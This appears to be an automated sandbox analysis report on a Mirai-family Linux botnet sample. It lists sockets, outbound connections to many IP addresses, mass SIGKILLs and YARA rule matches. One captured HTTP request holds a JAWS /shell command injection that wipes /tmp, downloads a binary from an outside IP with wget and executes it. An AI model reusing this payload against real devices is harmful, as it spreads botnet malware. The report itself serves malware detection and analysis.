      Source: /tmp/SLdtSSVlj2 (PID: 5275)Socket: 0.0.0.0::52869Jump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5275)Socket: 0.0.0.0::37215Jump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5275)Socket: 0.0.0.0::81Jump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5275)Socket: 0.0.0.0::8089Jump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5275)Socket: 0.0.0.0::8088Jump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5275)Socket: 0.0.0.0::8083Jump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5275)Socket: 0.0.0.0::443Jump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5275)Socket: 0.0.0.0::4444Jump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5275)Socket: 0.0.0.0::8001Jump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5275)Socket: 0.0.0.0::49152Jump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5275)Socket: 0.0.0.0::40960Jump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5275)Socket: 0.0.0.0::1024Jump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5275)Socket: 0.0.0.0::1337Jump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5275)Socket: 0.0.0.0::420Jump to behavior
      Source: /lib/systemd/systemd-journald (PID: 5325)Socket: <unknown socket type>:unknownJump to behavior
      Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 443
      Source: unknownTCP traffic detected without corresponding DNS query: 59.56.176.218
      Source: unknownTCP traffic detected without corresponding DNS query: 171.8.147.10
      Source: unknownTCP traffic detected without corresponding DNS query: 125.203.73.149
      Source: unknownTCP traffic detected without corresponding DNS query: 93.124.75.115
      Source: unknownTCP traffic detected without corresponding DNS query: 45.28.151.44
      Source: unknownTCP traffic detected without corresponding DNS query: 168.122.77.69
      Source: unknownTCP traffic detected without corresponding DNS query: 111.231.133.154
      Source: unknownTCP traffic detected without corresponding DNS query: 42.72.218.69
      Source: unknownTCP traffic detected without corresponding DNS query: 124.111.175.215
      Source: unknownTCP traffic detected without corresponding DNS query: 107.197.27.28
      Source: unknownTCP traffic detected without corresponding DNS query: 116.96.54.65
      Source: unknownTCP traffic detected without corresponding DNS query: 118.121.103.45
      Source: unknownTCP traffic detected without corresponding DNS query: 24.197.74.37
      Source: unknownTCP traffic detected without corresponding DNS query: 163.145.193.9
      Source: unknownTCP traffic detected without corresponding DNS query: 134.155.92.44
      Source: unknownTCP traffic detected without corresponding DNS query: 183.237.208.127
      Source: unknownTCP traffic detected without corresponding DNS query: 195.22.149.59
      Source: unknownTCP traffic detected without corresponding DNS query: 220.171.237.96
      Source: unknownTCP traffic detected without corresponding DNS query: 137.130.224.50
      Source: unknownTCP traffic detected without corresponding DNS query: 141.248.156.246
      Source: unknownTCP traffic detected without corresponding DNS query: 219.139.170.176
      Source: unknownTCP traffic detected without corresponding DNS query: 209.161.166.222
      Source: unknownTCP traffic detected without corresponding DNS query: 43.62.31.90
      Source: unknownTCP traffic detected without corresponding DNS query: 12.78.157.250
      Source: unknownTCP traffic detected without corresponding DNS query: 59.174.231.21
      Source: unknownTCP traffic detected without corresponding DNS query: 36.255.173.8
      Source: unknownTCP traffic detected without corresponding DNS query: 154.185.192.181
      Source: unknownTCP traffic detected without corresponding DNS query: 223.48.19.162
      Source: unknownTCP traffic detected without corresponding DNS query: 148.44.194.235
      Source: unknownTCP traffic detected without corresponding DNS query: 105.70.94.103
      Source: unknownTCP traffic detected without corresponding DNS query: 2.152.239.194
      Source: unknownTCP traffic detected without corresponding DNS query: 82.28.36.35
      Source: unknownTCP traffic detected without corresponding DNS query: 101.157.180.96
      Source: unknownTCP traffic detected without corresponding DNS query: 216.43.59.137
      Source: unknownTCP traffic detected without corresponding DNS query: 190.57.223.135
      Source: unknownTCP traffic detected without corresponding DNS query: 72.216.180.22
      Source: unknownTCP traffic detected without corresponding DNS query: 154.216.6.37
      Source: unknownTCP traffic detected without corresponding DNS query: 51.126.45.5
      Source: unknownTCP traffic detected without corresponding DNS query: 158.14.135.163
      Source: unknownTCP traffic detected without corresponding DNS query: 35.136.38.83
      Source: unknownTCP traffic detected without corresponding DNS query: 139.106.192.0
      Source: unknownTCP traffic detected without corresponding DNS query: 119.31.153.65
      Source: unknownTCP traffic detected without corresponding DNS query: 87.203.165.240
      Source: unknownTCP traffic detected without corresponding DNS query: 12.3.226.82
      Source: unknownTCP traffic detected without corresponding DNS query: 112.190.123.116
      Source: unknownTCP traffic detected without corresponding DNS query: 152.86.147.139
      Source: unknownTCP traffic detected without corresponding DNS query: 95.92.170.188
      Source: unknownTCP traffic detected without corresponding DNS query: 111.8.223.182
      Source: unknownTCP traffic detected without corresponding DNS query: 171.34.91.29
      Source: unknownTCP traffic detected without corresponding DNS query: 113.140.3.145
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: JAWS/1.0 Jan 21 2017Content-Type: text/html; charset=UTF-8Content-length: 213
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive

      System Summary:

      barindex
      Malicious sample detected (through community Yara rule)Show sources
      Source: SLdtSSVlj2, type: SAMPLEMatched rule: Detects Mirai Botnet Malware Author: Florian Roth
      Source: SLdtSSVlj2, type: SAMPLEMatched rule: Detects ELF malware Mirai related Author: Florian Roth
      Source: 5275.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORYMatched rule: Detects Mirai Botnet Malware Author: Florian Roth
      Source: 5275.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORYMatched rule: Detects ELF malware Mirai related Author: Florian Roth
      Source: 5267.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORYMatched rule: Detects Mirai Botnet Malware Author: Florian Roth
      Source: 5267.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORYMatched rule: Detects ELF malware Mirai related Author: Florian Roth
      Source: 5279.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORYMatched rule: Detects Mirai Botnet Malware Author: Florian Roth
      Source: 5279.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORYMatched rule: Detects ELF malware Mirai related Author: Florian Roth
      Source: 5270.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORYMatched rule: Detects Mirai Botnet Malware Author: Florian Roth
      Source: 5270.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORYMatched rule: Detects ELF malware Mirai related Author: Florian Roth
      Source: 5271.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORYMatched rule: Detects Mirai Botnet Malware Author: Florian Roth
      Source: 5271.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORYMatched rule: Detects ELF malware Mirai related Author: Florian Roth
      Source: 5276.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORYMatched rule: Detects Mirai Botnet Malware Author: Florian Roth
      Source: 5276.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORYMatched rule: Detects ELF malware Mirai related Author: Florian Roth
      Source: 5280.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORYMatched rule: Detects Mirai Botnet Malware Author: Florian Roth
      Source: 5280.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORYMatched rule: Detects ELF malware Mirai related Author: Florian Roth
      Sample tries to kill multiple processes (SIGKILL)Show sources
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 936, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5275, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 658, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 720, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 759, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 761, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 772, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 797, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 1320, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 1334, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 1335, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 1389, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 1809, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 1872, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 1983, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 2048, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 4331, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5025, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5218, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5219, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5271, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5279, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5280, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5309, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5321, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5322, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5323, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5325, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5326, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5337, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5340, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5399, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5401, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5402, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5403, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5404, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5407, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5465, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5466, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5469, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5491, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5495, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5496, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5501, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5502, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5523, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5527, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5538, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5561, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5592, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5595, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5598, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5599, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5600, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5601, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5602, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5603, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5604, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5605, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5606, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5607, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5608, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5609, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5610, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5611, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5612, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5613, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5614, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5275)SIGKILL sent: pid: 936, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5275)SIGKILL sent: pid: 491, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5275)SIGKILL sent: pid: 658, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5275)SIGKILL sent: pid: 720, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5275)SIGKILL sent: pid: 721, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5275)SIGKILL sent: pid: 759, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5275)SIGKILL sent: pid: 761, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5275)SIGKILL sent: pid: 772, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5275)SIGKILL sent: pid: 774, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5275)SIGKILL sent: pid: 777, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5275)SIGKILL sent: pid: 785, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5275)SIGKILL sent: pid: 793, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5275)SIGKILL sent: pid: 797, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5275)SIGKILL sent: pid: 1320, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5275)SIGKILL sent: pid: 1334, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5275)SIGKILL sent: pid: 1335, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5275)SIGKILL sent: pid: 1344, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5275)SIGKILL sent: pid: 1389, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5275)SIGKILL sent: pid: 1476, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5275)SIGKILL sent: pid: 1601, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5275)SIGKILL sent: pid: 1809, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5275)SIGKILL sent: pid: 1860, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5275)SIGKILL sent: pid: 1872, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5275)SIGKILL sent: pid: 1886, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5275)SIGKILL sent: pid: 1983, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5275)SIGKILL sent: pid: 2038, result: successfulJump to behavior
      Source: SLdtSSVlj2, type: SAMPLEMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: SLdtSSVlj2, type: SAMPLEMatched rule: Mirai_Botnet_Malware date = 2016-10-04, hash5 = 420bf9215dfb04e5008c5e522eee9946599e2b323b17f17919cd802ebb012175, hash4 = 2efa09c124f277be2199bee58f49fc0ce6c64c0bef30079dfb3d94a6de492a69, hash3 = 20683ff7a5fec1237fc09224af40be029b9548c62c693844624089af568c89d4, hash2 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, hash1 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, author = Florian Roth, description = Detects Mirai Botnet Malware, hash10 = c61bf95146c68bfbbe01d7695337ed0e93ea759f59f651799f07eecdb339f83f, hash11 = d9573c3850e2ae35f371dff977fc3e5282a5e67db8e3274fd7818e8273fd5c89, hash12 = f1100c84abff05e0501e77781160d9815628e7fd2de9e53f5454dbcac7c84ca5, hash9 = bf0471b37dba7939524a30d7d5afc8fcfb8d4a7c9954343196737e72ea4e2dc4, hash8 = 89570ae59462e6472b6769545a999bde8457e47ae0d385caaa3499ab735b8147, hash7 = 70bb0ec35dd9afcfd52ec4e1d920e7045dc51dca0573cd4c753987c9d79405c0, hash6 = 62cdc8b7fffbaf5683a466f6503c03e68a15413a90f6afd5a13ba027631460c6, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash13 = fb713ccf839362bf0fbe01aedd6796f4d74521b133011b408e42c1fd9ab8246b
      Source: SLdtSSVlj2, type: SAMPLEMatched rule: MAL_ELF_LNX_Mirai_Oct10_2 date = 2018-10-27, hash1 = fa0018e75f503f9748a5de0d14d4358db234f65e28c31c8d5878cc58807081c9, author = Florian Roth, description = Detects ELF malware Mirai related, reference = Internal Research
      Source: 5275.1.000000002ac99f32.000000004dded084.rw-.sdmp, type: MEMORYMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 5276.1.000000002ac99f32.000000004dded084.rw-.sdmp, type: MEMORYMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 5275.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORYMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 5275.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORYMatched rule: Mirai_Botnet_Malware date = 2016-10-04, hash5 = 420bf9215dfb04e5008c5e522eee9946599e2b323b17f17919cd802ebb012175, hash4 = 2efa09c124f277be2199bee58f49fc0ce6c64c0bef30079dfb3d94a6de492a69, hash3 = 20683ff7a5fec1237fc09224af40be029b9548c62c693844624089af568c89d4, hash2 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, hash1 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, author = Florian Roth, description = Detects Mirai Botnet Malware, hash10 = c61bf95146c68bfbbe01d7695337ed0e93ea759f59f651799f07eecdb339f83f, hash11 = d9573c3850e2ae35f371dff977fc3e5282a5e67db8e3274fd7818e8273fd5c89, hash12 = f1100c84abff05e0501e77781160d9815628e7fd2de9e53f5454dbcac7c84ca5, hash9 = bf0471b37dba7939524a30d7d5afc8fcfb8d4a7c9954343196737e72ea4e2dc4, hash8 = 89570ae59462e6472b6769545a999bde8457e47ae0d385caaa3499ab735b8147, hash7 = 70bb0ec35dd9afcfd52ec4e1d920e7045dc51dca0573cd4c753987c9d79405c0, hash6 = 62cdc8b7fffbaf5683a466f6503c03e68a15413a90f6afd5a13ba027631460c6, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash13 = fb713ccf839362bf0fbe01aedd6796f4d74521b133011b408e42c1fd9ab8246b
      Source: 5275.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORYMatched rule: MAL_ELF_LNX_Mirai_Oct10_2 date = 2018-10-27, hash1 = fa0018e75f503f9748a5de0d14d4358db234f65e28c31c8d5878cc58807081c9, author = Florian Roth, description = Detects ELF malware Mirai related, reference = Internal Research
      Source: 5267.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORYMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 5267.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORYMatched rule: Mirai_Botnet_Malware date = 2016-10-04, hash5 = 420bf9215dfb04e5008c5e522eee9946599e2b323b17f17919cd802ebb012175, hash4 = 2efa09c124f277be2199bee58f49fc0ce6c64c0bef30079dfb3d94a6de492a69, hash3 = 20683ff7a5fec1237fc09224af40be029b9548c62c693844624089af568c89d4, hash2 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, hash1 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, author = Florian Roth, description = Detects Mirai Botnet Malware, hash10 = c61bf95146c68bfbbe01d7695337ed0e93ea759f59f651799f07eecdb339f83f, hash11 = d9573c3850e2ae35f371dff977fc3e5282a5e67db8e3274fd7818e8273fd5c89, hash12 = f1100c84abff05e0501e77781160d9815628e7fd2de9e53f5454dbcac7c84ca5, hash9 = bf0471b37dba7939524a30d7d5afc8fcfb8d4a7c9954343196737e72ea4e2dc4, hash8 = 89570ae59462e6472b6769545a999bde8457e47ae0d385caaa3499ab735b8147, hash7 = 70bb0ec35dd9afcfd52ec4e1d920e7045dc51dca0573cd4c753987c9d79405c0, hash6 = 62cdc8b7fffbaf5683a466f6503c03e68a15413a90f6afd5a13ba027631460c6, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash13 = fb713ccf839362bf0fbe01aedd6796f4d74521b133011b408e42c1fd9ab8246b
      Source: 5267.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORYMatched rule: MAL_ELF_LNX_Mirai_Oct10_2 date = 2018-10-27, hash1 = fa0018e75f503f9748a5de0d14d4358db234f65e28c31c8d5878cc58807081c9, author = Florian Roth, description = Detects ELF malware Mirai related, reference = Internal Research
      Source: 5270.1.000000002ac99f32.000000004dded084.rw-.sdmp, type: MEMORYMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 5279.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORYMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 5279.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORYMatched rule: Mirai_Botnet_Malware date = 2016-10-04, hash5 = 420bf9215dfb04e5008c5e522eee9946599e2b323b17f17919cd802ebb012175, hash4 = 2efa09c124f277be2199bee58f49fc0ce6c64c0bef30079dfb3d94a6de492a69, hash3 = 20683ff7a5fec1237fc09224af40be029b9548c62c693844624089af568c89d4, hash2 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, hash1 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, author = Florian Roth, description = Detects Mirai Botnet Malware, hash10 = c61bf95146c68bfbbe01d7695337ed0e93ea759f59f651799f07eecdb339f83f, hash11 = d9573c3850e2ae35f371dff977fc3e5282a5e67db8e3274fd7818e8273fd5c89, hash12 = f1100c84abff05e0501e77781160d9815628e7fd2de9e53f5454dbcac7c84ca5, hash9 = bf0471b37dba7939524a30d7d5afc8fcfb8d4a7c9954343196737e72ea4e2dc4, hash8 = 89570ae59462e6472b6769545a999bde8457e47ae0d385caaa3499ab735b8147, hash7 = 70bb0ec35dd9afcfd52ec4e1d920e7045dc51dca0573cd4c753987c9d79405c0, hash6 = 62cdc8b7fffbaf5683a466f6503c03e68a15413a90f6afd5a13ba027631460c6, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash13 = fb713ccf839362bf0fbe01aedd6796f4d74521b133011b408e42c1fd9ab8246b
      Source: 5279.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORYMatched rule: MAL_ELF_LNX_Mirai_Oct10_2 date = 2018-10-27, hash1 = fa0018e75f503f9748a5de0d14d4358db234f65e28c31c8d5878cc58807081c9, author = Florian Roth, description = Detects ELF malware Mirai related, reference = Internal Research
      Source: 5270.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORYMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 5270.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORYMatched rule: Mirai_Botnet_Malware date = 2016-10-04, hash5 = 420bf9215dfb04e5008c5e522eee9946599e2b323b17f17919cd802ebb012175, hash4 = 2efa09c124f277be2199bee58f49fc0ce6c64c0bef30079dfb3d94a6de492a69, hash3 = 20683ff7a5fec1237fc09224af40be029b9548c62c693844624089af568c89d4, hash2 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, hash1 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, author = Florian Roth, description = Detects Mirai Botnet Malware, hash10 = c61bf95146c68bfbbe01d7695337ed0e93ea759f59f651799f07eecdb339f83f, hash11 = d9573c3850e2ae35f371dff977fc3e5282a5e67db8e3274fd7818e8273fd5c89, hash12 = f1100c84abff05e0501e77781160d9815628e7fd2de9e53f5454dbcac7c84ca5, hash9 = bf0471b37dba7939524a30d7d5afc8fcfb8d4a7c9954343196737e72ea4e2dc4, hash8 = 89570ae59462e6472b6769545a999bde8457e47ae0d385caaa3499ab735b8147, hash7 = 70bb0ec35dd9afcfd52ec4e1d920e7045dc51dca0573cd4c753987c9d79405c0, hash6 = 62cdc8b7fffbaf5683a466f6503c03e68a15413a90f6afd5a13ba027631460c6, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash13 = fb713ccf839362bf0fbe01aedd6796f4d74521b133011b408e42c1fd9ab8246b
      Source: 5270.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORYMatched rule: MAL_ELF_LNX_Mirai_Oct10_2 date = 2018-10-27, hash1 = fa0018e75f503f9748a5de0d14d4358db234f65e28c31c8d5878cc58807081c9, author = Florian Roth, description = Detects ELF malware Mirai related, reference = Internal Research
      Source: 5271.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORYMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
